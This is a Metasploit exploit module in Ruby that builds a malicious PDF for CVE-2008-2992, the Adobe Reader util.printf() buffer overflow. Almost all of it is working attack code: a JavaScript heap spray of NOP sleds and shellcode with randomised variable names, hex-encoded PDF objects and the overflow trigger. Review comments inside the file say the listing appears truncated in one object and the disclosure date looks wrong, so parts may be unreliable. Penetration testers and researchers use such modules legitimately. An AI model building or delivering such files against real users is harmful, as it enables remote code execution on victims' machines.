##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'msf/core'
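class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::FILEFORMAT

	# JavaScript names that must never be handed out as one of the randomised
	# variable names in the spray script: reserved words, plus the globals the
	# script itself depends on (a variable called "util" would shadow the util
	# object and silently break the util.printf() trigger).
	JS_NAME_BLACKLIST = %w(
		break case catch continue default delete do else finally for function
		if in instanceof new return switch this throw try typeof var void
		while with
		util unescape Array
	).freeze

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Adobe util.printf() Buffer Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional
				< 8.1.3. By creating a specially crafted pdf that contains a malformed util.printf()
				entry, an attacker may be able to execute arbitrary code.
			},
			'License'        => MSF_LICENSE,
			'Author'         => [ 'MC' ],
			'Version'        => '$Revision:$',
			'References'     =>
				[
					[ 'CVE', '2008-2992' ],
				],
			'DefaultOptions' =>
				{
					# Terminate the whole Reader process when the payload exits.
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 1024,
					# The payload is %u-escaped into a JavaScript string (see exploit),
					# so NUL is the only byte that needs to be excluded.
					'BadChars' => "\x00",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					# 'Ret' is not referenced by exploit(): execution is meant to land
					# in the heap spray, so no fixed return address is used.
					[ 'Adobe Reader v8.1.2 (Windows XP SP3 English)', { 'Ret' => '' } ],
				],
			# NOTE(review): the vendor fix (8.1.3) and the CVE were published in
			# November 2008; 'Feb 8 2008' looks wrong -- confirm against the
			# Adobe advisory before relying on this date.
			'DisclosureDate' => 'Feb 8 2008',
			'DefaultTarget'  => 0))

		# FILENAME is the only option this module reads itself (in exploit);
		# OUTPUTPATH is presumably consumed by the FILEFORMAT mixin's file_create.
		register_options(
			[
				OptString.new('FILENAME',   [ false, 'The file name.', 'msf.pdf']),
				OptString.new('OUTPUTPATH', [ false, 'The location of the file.', './data/exploits/']),
			], self.class)
	end

	# Build the malicious PDF and hand it to the FILEFORMAT mixin's file_create.
	#
	# The document carries one /OpenAction JavaScript action that fills memory
	# with 1450 blocks of roughly 0x40000 characters (NOP sled + payload) and then
	# triggers the overflow with util.printf("%45000.45000f", 0).
	#
	# Object layout: 1 Catalog, 2 Outlines, 3 Pages, 4 Page, 5 content stream,
	# 6 Font, 7 JavaScript action.  The xref table at the end carries hard-coded
	# byte offsets for objects 1..7, so nothing before object 7's /JS string may
	# change in length; only the script (last object) and startxref vary.
	def exploit
		# %u-escape the payload so unescape() rebuilds it as a JavaScript string.
		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

		# Four NOP bytes, also %u-escaped, used as the sled filler.
		nops = Rex::Text.to_unescape(make_nops(4))

		# Randomise the %PDF-x.y header: major 1..2, minor 1..5.  This keeps the
		# header length constant (the xref offsets depend on it).  A 2.x major was
		# not a published PDF version when this was written; kept as the original
		# had it, since Reader appears to tolerate it.
		pdf_version = "#{1 + rand(2)}.#{1 + rand(5)}"

		# Eleven distinct JavaScript identifiers for the spray script.  They are
		# drawn from rand_text_alpha (letters only, so always a legal identifier);
		# duplicates and blacklisted names are rejected because either would
		# break the script.
		names = []
		while names.length < 11
			candidate = rand_text_alpha(rand(100) + 1)
			next if names.include?(candidate) || JS_NAME_BLACKLIST.include?(candidate)
			names << candidate
		end
		rand1, rand2, rand3, rand4, rand5, rand6, rand7, rand8, rand9, rand10, rand11 = names

		# Heap-spray script: rand4 = 129 x 4-byte NOPs + shellcode; rand9 is a NOP
		# run padded so that (rand9 + rand4) is about 0x40000 chars; rand10 holds
		# 1450 such blocks.  The final util.printf() call is the overflow trigger.
		script = %Q|
var #{rand1} = unescape("#{shellcode}");
var #{rand2} ="";
for (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape("#{nops}");
#{rand4} = #{rand2} + #{rand1};
#{rand5} = unescape("#{nops}");
#{rand6} = 20;
#{rand7} = #{rand6}+#{rand4}.length
while (#{rand5}.length<#{rand7}) #{rand5}+=#{rand5};
#{rand8} = #{rand5}.substring(0, #{rand7});
#{rand9} = #{rand5}.substring(0, #{rand5}.length-#{rand7});
while(#{rand9}.length+#{rand7} < 0x40000) #{rand9} = #{rand9}+#{rand9}+#{rand8};
#{rand10} = new Array();
for (#{rand11}=0;#{rand11}<1450;#{rand11}++) #{rand10}[#{rand11}] = #{rand9} + #{rand4};
util.printf("%45000.45000f", 0);
|

		# Header and object 1: "%PDF-x.y\n\n1 0 obj\n<<\n /Type /Catalog\n /Outlines 2 0 R\n
		#  /Pages 3 0 R\n /OpenAction 7 0 R\n>>\nendobj"
		pdf = "\x25\x50\x44\x46\x2d" + pdf_version + "\x0a\x0a\x31\x20\x30\x20\x6f\x62"
		pdf << "\x6a\x0a\x3c\x3c\x0a\x20\x2f\x54\x79\x70\x65\x20\x2f\x43\x61\x74"
		pdf << "\x61\x6c\x6f\x67\x0a\x20\x2f\x4f\x75\x74\x6c\x69\x6e\x65\x73\x20"
		pdf << "\x32\x20\x30\x20\x52\x0a\x20\x2f\x50\x61\x67\x65\x73\x20\x33\x20"
		pdf << "\x30\x20\x52\x0a\x20\x2f\x4f\x70\x65\x6e\x41\x63\x74\x69\x6f\x6e"
		pdf << "\x20\x37\x20\x30\x20\x52\x0a\x3e\x3e\x0a\x65\x6e\x64\x6f\x62\x6a"
		# Object 2: "<<\n /Type /Outlines\n /Count 0\n>>\nendobj"
		pdf << "\x0a\x0a\x32\x20\x30\x20\x6f\x62\x6a\x0a\x3c\x3c\x0a\x20\x2f\x54"
		pdf << "\x79\x70\x65\x20\x2f\x4f\x75\x74\x6c\x69\x6e\x65\x73\x0a\x20\x2f"
		pdf << "\x43\x6f\x75\x6e\x74\x20\x30\x0a\x3e\x3e\x0a\x65\x6e\x64\x6f\x62"
		# Object 3: "<<\n /Type /Pages\n /Kids [4 0 R]\n /Count 1\n>>\nendobj"
		pdf << "\x6a\x0a\x0a\x33\x20\x30\x20\x6f\x62\x6a\x0a\x3c\x3c\x0a\x20\x2f"
		pdf << "\x54\x79\x70\x65\x20\x2f\x50\x61\x67\x65\x73\x0a\x20\x2f\x4b\x69"
		pdf << "\x64\x73\x20\x5b\x34\x20\x30\x20\x52\x5d\x0a\x20\x2f\x43\x6f\x75"
		pdf << "\x6e\x74\x20\x31\x0a\x3e\x3e\x0a\x65\x6e\x64\x6f\x62\x6a\x0a\x0a"
		# Object 4: the single Page (612x792, /Contents 5 0 R, /Font /F1 6 0 R)
		pdf << "\x34\x20\x30\x20\x6f\x62\x6a\x0a\x3c\x3c\x0a\x20\x2f\x54\x79\x70"
		pdf << "\x65\x20\x2f\x50\x61\x67\x65\x0a\x20\x2f\x50\x61\x72\x65\x6e\x74"
		pdf << "\x20\x33\x20\x30\x20\x52\x0a\x20\x2f\x4d\x65\x64\x69\x61\x42\x6f"
		pdf << "\x78\x20\x5b\x30\x20\x30\x20\x36\x31\x32\x20\x37\x39\x32\x5d\x0a"
		pdf << "\x20\x2f\x43\x6f\x6e\x74\x65\x6e\x74\x73\x20\x35\x20\x30\x20\x52"
		pdf << "\x0a\x20\x2f\x52\x65\x73\x6f\x75\x72\x63\x65\x73\x20\x3c\x3c\x0a"
		pdf << "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2f\x50\x72"
		pdf << "\x6f\x63\x53\x65\x74\x20\x5b\x2f\x50\x44\x46\x20\x2f\x54\x65\x78"
		pdf << "\x74\x5d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
		pdf << "\x2f\x46\x6f\x6e\x74\x20\x3c\x3c\x20\x2f\x46\x31\x20\x36\x20\x30"
		pdf << "\x20\x52\x20\x3e\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
		pdf << "\x20\x20\x3e\x3e\x0a\x3e\x3e\x0a\x65\x6e\x64\x6f\x62\x6a\x0a\x0a"
		# Object 5: "<< /Length 56 >>\nstream\nBT /F1 12 Tf 100 700 Td 15 TL ("
		pdf << "\x35\x20\x30\x20\x6f\x62\x6a\x0a\x3c\x3c\x20\x2f\x4c\x65\x6e\x67"
		pdf << "\x74\x68\x20\x35\x36\x20\x3e\x3e\x0a\x73\x74\x72\x65\x61\x6d\x0a"
		pdf << "\x42\x54\x20\x2f\x46\x31\x20\x31\x32\x20\x54\x66\x20\x31\x30\x30"
		pdf << "\x20\x37\x30\x30\x20\x54\x64\x20\x31\x35\x20\x54\x4c\x20\x28"
		# NOTE(review): this listing appears truncated here.  Only "e" is emitted
		# before the "am\nendobj" that follows, i.e. the text operand, the closing
		# ") Tj ET" and the "endstre" prefix of "endstream" are missing.  The
		# /Length 56 above and the xref offset 507 for object 6 both assume the
		# full 56-byte stream plus EOL; verify against the upstream module before use.
		pdf << "\x65"
		# "am\nendobj\n\n" then object 6: "<<\n /Type /Font\n /Subtype /Type1\n /Name /F1\n
		#  /BaseFont /Helvetica\n /Encoding /MacRomanEncoding\n>>\nendobj"
		pdf << "\x61\x6d\x0a\x65\x6e\x64\x6f\x62\x6a\x0a\x0a\x36\x20\x30\x20\x6f"
		pdf << "\x62\x6a\x0a\x3c\x3c\x0a\x20\x2f\x54\x79\x70\x65\x20\x2f\x46\x6f"
		pdf << "\x6e\x74\x0a\x20\x2f\x53\x75\x62\x74\x79\x70\x65\x20\x2f\x54\x79"
		pdf << "\x70\x65\x31\x0a\x20\x2f\x4e\x61\x6d\x65\x20\x2f\x46\x31\x0a\x20"
		pdf << "\x2f\x42\x61\x73\x65\x46\x6f\x6e\x74\x20\x2f\x48\x65\x6c\x76\x65"
		pdf << "\x74\x69\x63\x61\x0a\x20\x2f\x45\x6e\x63\x6f\x64\x69\x6e\x67\x20"
		pdf << "\x2f\x4d\x61\x63\x52\x6f\x6d\x61\x6e\x45\x6e\x63\x6f\x64\x69\x6e"
		# Object 7: "<<\n /Type /Action\n /S /JavaScript\n /JS (" + script + ")"
		# The script is embedded as a PDF literal string; its parentheses are
		# balanced and it contains no backslashes, so no escaping is required.
		pdf << "\x67\x0a\x3e\x3e\x0a\x65\x6e\x64\x6f\x62\x6a\x0a\x0a\x37\x20\x30"
		pdf << "\x20\x6f\x62\x6a\x0a\x3c\x3c\x0a\x20\x2f\x54\x79\x70\x65\x20\x2f"
		pdf << "\x41\x63\x74\x69\x6f\x6e\x0a\x20\x2f\x53\x20\x2f\x4a\x61\x76\x61"
		pdf << "\x53\x63\x72\x69\x70\x74\x0a\x20\x2f\x4a\x53\x20\x28"
		pdf << script
		pdf << "\x0a\x0a\x0a"
		pdf << "\x29\x0a\x3e\x3e\x0a\x65\x6e\x64\x6f\x62\x6a\x0a\x0a"

		# startxref must hold the byte offset of the "xref" keyword, so capture it
		# here, immediately before the table is written.  (The original captured
		# it inside the trailer dictionary, producing a malformed startxref that
		# Reader only opens because it rebuilds the cross-reference table.)
		xref_position = pdf.length

		# xref table: 8 entries (0 free, objects 1..7 at 10, 98, 147, 208, 400,
		# 507 and 621) followed by "trailer\n<<\n /Size 8\n /Root 1 0 R\n>>".
		pdf << "\x78\x72\x65"
		pdf << "\x66\x0a\x30\x20\x38\x0a\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"
		pdf << "\x20\x36\x35\x35\x33\x35\x20\x66\x0a\x30\x30\x30\x30\x30\x30\x30"
		pdf << "\x30\x31\x30\x20\x30\x30\x30\x30\x30\x20\x6e\x0a\x30\x30\x30\x30"
		pdf << "\x30\x30\x30\x30\x39\x38\x20\x30\x30\x30\x30\x30\x20\x6e\x0a\x30"
		pdf << "\x30\x30\x30\x30\x30\x30\x31\x34\x37\x20\x30\x30\x30\x30\x30\x20"
		pdf << "\x6e\x0a\x30\x30\x30\x30\x30\x30\x30\x32\x30\x38\x20\x30\x30\x30"
		pdf << "\x30\x30\x20\x6e\x0a\x30\x30\x30\x30\x30\x30\x30\x34\x30\x30\x20"
		pdf << "\x30\x30\x30\x30\x30\x20\x6e\x0a\x30\x30\x30\x30\x30\x30\x30\x35"
		pdf << "\x30\x37\x20\x30\x30\x30\x30\x30\x20\x6e\x0a\x30\x30\x30\x30\x30"
		pdf << "\x30\x30\x36\x32\x31\x20\x30\x30\x30\x30\x30\x20\x6e\x0a\x74\x72"
		pdf << "\x61\x69\x6c\x65\x72\x0a\x3c\x3c\x0a\x20\x2f\x53\x69\x7a\x65\x20"
		pdf << "\x38\x0a\x20\x2f\x52\x6f\x6f\x74\x20\x31\x20\x30\x20\x52\x0a\x3e"
		# ">\nstartxref\n<offset>\n%%EOF\n"
		pdf << "\x3e\x0a\x73\x74\x61\x72\x74\x78\x72\x65\x66\x0a" + xref_position.to_s
		pdf << "\x0a\x25\x25\x45\x4f\x46\x0a"

		print_status("Creating '#{datastore['FILENAME']}' file...")

		# Output location is handled by the FILEFORMAT mixin (FILENAME/OUTPUTPATH).
		file_create(pdf)
	end

end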